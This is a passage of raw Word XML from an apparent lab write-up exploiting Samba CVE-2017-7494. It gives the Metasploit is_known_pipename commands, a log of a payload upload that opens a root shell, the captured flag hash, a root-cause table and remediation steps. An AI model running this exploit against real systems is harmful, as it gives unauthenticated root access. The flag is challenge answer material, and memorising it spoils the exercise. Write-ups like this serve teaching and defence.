          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">2017-03-24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Excellent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1160"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E2761" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E2761"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The module was selected and configured with the target's IP address and the SMB port:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1B1F27" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">msf &gt; use exploit/linux/samba/is_known_pipename</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">msf exploit(linux/samba/is_known_pipename) &gt; set RHOST 10.124.239.226</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">msf exploit(linux/samba/is_known_pipename) &gt; set RPORT 139</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5669280" cy="7670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767020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5A5F6B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4 — Setting RHOST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5669280" cy="3063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306312"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5A5F6B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5 — Setting RPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Running the exploit uploaded a malicious shared object (.so) payload to the world-writable tmp share and coerced the Samba daemon into loading it via a named pipe path:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1B1F27" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">msf exploit(linux/samba/is_known_pipename) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5669280" cy="13903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9280" cy="1390345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5A5F6B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6 — Successful exploitation and shell establishment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Key log excerpt:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1B1F27" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] 10.124.239.226:139 - Using location \\10.124.239.226\tmp\ for the path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">[*] 10.124.239.226:139 - Share 'tmp' has server-side path '/var/tmp'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">[*] 10.124.239.226:139 - Uploaded payload to \\10.124.239.226\tmp\TmhGaEHI.so</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">[+] 10.124.239.226:139 - Probe response indicates the interactive payload was loaded ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">[*] Found shell.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">[*] Command shell session 1 opened (10.124.239.204:36601 -&gt; 10.124.239.226:139)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The first two load attempts failed (STATUS_OBJECT_NAME_NOT_FOUND) due to path resolution differences between the SMB-visible path and the server-side filesystem path, but the module automatically retried with the correct server-side path (/var/tmp/...) and succeeded — a good illustration of why this exploit historically required some path-handling finesse depending on share configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E2761" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E2761"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Post-Exploitation &amp; Privilege Confirmation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the command shell session was established, identity and privilege level were confirmed immediately:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1B1F27" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">cd /root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">cat flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5669280" cy="25704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9280" cy="2570432"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5A5F6B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7 — Root shell with directory listing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1B1F27" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The payload executed in the context of the Samba daemon, which was running as root — meaning exploitation resulted in immediate, unauthenticated root access with no further privilege escalation required. The /root directory contained several artifacts (fix-wordpress.sh, flag.txt, issue, python.sh, wordpress.sql) consistent with a deliberately constructed vulnerable lab image.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E2761" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E2761"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Flag Capture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1B1F27" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">cat flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5669280" cy="28273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9280" cy="2827353"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5A5F6B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 8 — Flag captured</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1B1F27" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="E8E8E8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">b6b545dc11b7a270f4bad23432190c75162c4a2b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Root flag successfully retrieved, confirming full compromise of the target host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E2761" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E2761"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Root Cause Analysis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7260"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="220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Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="726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Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7260"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2017-7494 — Samba is_known_pipename() Arbitrary Shared Library Load</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Affected Versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="726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Samba 3.5.0 through 4.4.13 / 4.5.9 / 4.6.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Root Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7260"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Samba fails to properly validate the path of a shared library loaded via a named pipe, allowing a client with write access to a share to upload and trigger execution of an arbitrary .so file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Prerequisite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="726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 world-writable SMB share (here, tmp, mapped to server-side /var/tmp)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7260"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Remote code execution as the Samba service account — root in this case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E2761" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E2761"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Patch Samba to a fixed version (4.6.4, 4.5.10, 4.4.14, or later).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable anonymous/guest write access to SMB shares; do not expose writable shares such as /tmp over SMB.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable SMB message signing (server signing = mandatory) to reduce exposure to related MITM and spoofing techniques — this scan showed signing disabled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
